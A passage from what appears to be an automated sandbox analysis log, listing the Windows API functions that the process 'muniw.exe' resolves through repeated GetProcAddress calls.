GetModuleFileNameW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetLocaleInfoW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetLocalTime (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetLastError (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetFullPathNameW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetFileSize (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetFileAttributesW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetExitCodeThread (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetDiskFreeSpaceW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetDateFormatW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetCurrentThreadId (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetCurrentThread (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcessId (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetCurrentProcess (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetComputerNameW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetCPInfo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FreeResource (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter InterlockedExchangeAdd (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter InterlockedExchange (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter InterlockedCompareExchange (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FreeLibrary (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FormatMessageW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FindResourceW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FindFirstFileW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FindClose (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FileTimeToSystemTime (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnumCalendarInfoW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnterCriticalSection (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DeleteCriticalSection (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateThread (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateFileW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateEventW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CompareStringW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CloseHandle (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter lstrcmpiA (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LoadLibraryA (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LocalFree (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetACP (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetSystemInfo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter lstrlenW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter lstrcpynW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LoadLibraryExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsValidLocale (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetSystemDefaultUILanguage (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetStartupInfoA (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetUserDefaultUILanguage (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetCommandLineW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ExitProcess (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ExitThread (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter UnhandledExceptionFilter (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RtlUnwind (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegQueryValueExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegOpenKeyExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegCloseKey (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegUnLoadKeyW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegSetValueExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegSaveKeyW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegRestoreKeyW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegReplaceKeyW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegQueryInfoKeyW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegLoadKeyW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegFlushKey (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegEnumValueW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegEnumKeyExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegDeleteValueW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegDeleteKeyW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegCreateKeyExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegConnectRegistryW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter InitializeFlatSB (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollProp (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollPos (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FlatSB_SetScrollInfo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollPos (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FlatSB_GetScrollInfo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter _TrackMouseEvent (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_GetImageInfo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_SetIconSize (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_GetIconSize (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_Write (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_Read (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_GetDragImage (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_DragShowNolock (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_DragMove (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_DragLeave (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_DragEnter (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_EndDrag (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_BeginDrag (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_Copy (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_LoadImageW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_GetIcon (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_Remove (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_DrawEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_Replace (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_Draw (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_SetOverlayImage (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_GetBkColor (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_SetBkColor (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_ReplaceIcon (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_Add (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_SetImageCount (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_GetImageCount (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_Destroy (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ImageList_Create (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetOpenFileNameW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter UnrealizeObject (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter StretchDIBits (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter StretchBlt (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter StartPage (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter StartDocW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetWindowOrgEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetWinMetaFileBits (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetViewportOrgEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetTextColor (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetStretchBltMode (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetROP2 (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetPixel (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetMapMode (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetEnhMetaFileBits (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetDIBits (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetDIBColorTable (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetBrushOrgEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetBkMode (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetBkColor (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetAbortProc (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SelectPalette (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SelectObject (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SelectClipRgn (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SaveDC (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RoundRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RestoreDC (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Rectangle (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RectVisible (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RealizePalette (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Polyline (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Polygon (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter PolyBezierTo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter PolyBezier (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter PlayEnhMetaFile (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Pie (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter PatBlt (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter MoveToEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter MaskBlt (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LineTo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IntersectClipRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetWindowOrgEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetWinMetaFileBits (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetTextMetricsW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetTextExtentPoint32W (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetSystemPaletteEntries (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetStockObject (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetRgnBox (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetPixel (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetPaletteEntries (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetObjectW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetEnhMetaFilePaletteEntries (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetEnhMetaFileHeader (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetEnhMetaFileDescriptionW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetEnhMetaFileBits (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetDeviceCaps (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetDIBits (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetDIBColorTable (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetDCOrgEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetCurrentPositionEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetClipBox (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetBrushOrgEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetBitmapBits (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GdiFlush (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter FrameRgn (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ExtTextOutW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ExtFloodFill (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ExcludeClipRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnumFontsW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EnumFontFamiliesExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EndPage (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter EndDoc (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Ellipse (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DeleteObject (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DeleteEnhMetaFile (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter DeleteDC (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateSolidBrush (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateRectRgn (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreatePenIndirect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreatePalette (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateICW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateHalftonePalette (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateFontIndirectW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateDIBitmap (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateDIBSection (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateDCW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateCompatibleDC (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateCompatibleBitmap (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateBrushIndirect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateBitmap (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CopyEnhMetaFileW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Chord (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter BitBlt (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter Arc (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter AbortDoc (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter AlphaBlend (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter OleUninitialize (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter OleInitialize (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CoTaskMemFree (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CoTaskMemAlloc (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CLSIDFromString (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter StringFromCLSID (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CoCreateInstance (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CoUninitialize (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CoInitialize (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsEqualGUID (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SafeArrayPtrOfIndex (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SafeArrayPutElement (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SafeArrayGetElement (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SafeArrayUnaccessData (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SafeArrayAccessData (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SafeArrayGetUBound (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SafeArrayGetLBound (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SafeArrayCreate (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VariantChangeType (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VariantCopyInd (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VariantCopy (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VariantClear (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter VariantInit (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter GetErrorInfo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SysFreeString (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SysReAllocStringLen (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SysAllocStringLen (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ShellExecuteW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter CreateWindowExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WindowFromPoint (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter WaitMessage (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter UpdateWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter UnregisterClassW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter UnhookWindowsHookEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter TranslateMessage (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter TranslateMDISysAccel (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter TrackPopupMenu (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SystemParametersInfoW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ShowWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ShowScrollBar (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ShowOwnedPopups (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetWindowsHookExW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetWindowTextW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetWindowPos (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetWindowPlacement (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetWindowLongW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetTimer (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetScrollRange (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetScrollPos (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetScrollInfo (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetPropW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetParent (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetMenuItemInfoW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetMenu (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetForegroundWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetFocus (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetCursorPos (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetCursor (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetClassLongW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetCapture (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SetActiveWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SendMessageA (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter SendMessageW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ScrollWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ScreenToClient (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RemovePropW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RemoveMenu (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ReleaseDC (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter ReleaseCapture (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegisterWindowMessageW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegisterClipboardFormatW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RegisterClassW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter RedrawWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter PtInRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter PostQuitMessage (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter PostMessageW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter PeekMessageA (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter PeekMessageW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter OffsetRect (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter MsgWaitForMultipleObjectsEx (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter MsgWaitForMultipleObjects (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter MessageBoxW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter MapWindowPoints (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter MapVirtualKeyW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LoadStringW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LoadKeyboardLayoutW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LoadIconW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LoadCursorW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter LoadBitmapW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter KillTimer (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsZoomed (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsWindowVisible (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsWindowUnicode (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsWindowEnabled (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsWindow (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsIconic (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsDialogMessageA (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsDialogMessageW (UID: 00000000-00001844)\n \"muniw.exe\" called \"GetProcAddress\" with a parameter IsChild (UID: 00000000-00001844)\n \"muniw.exe\" called 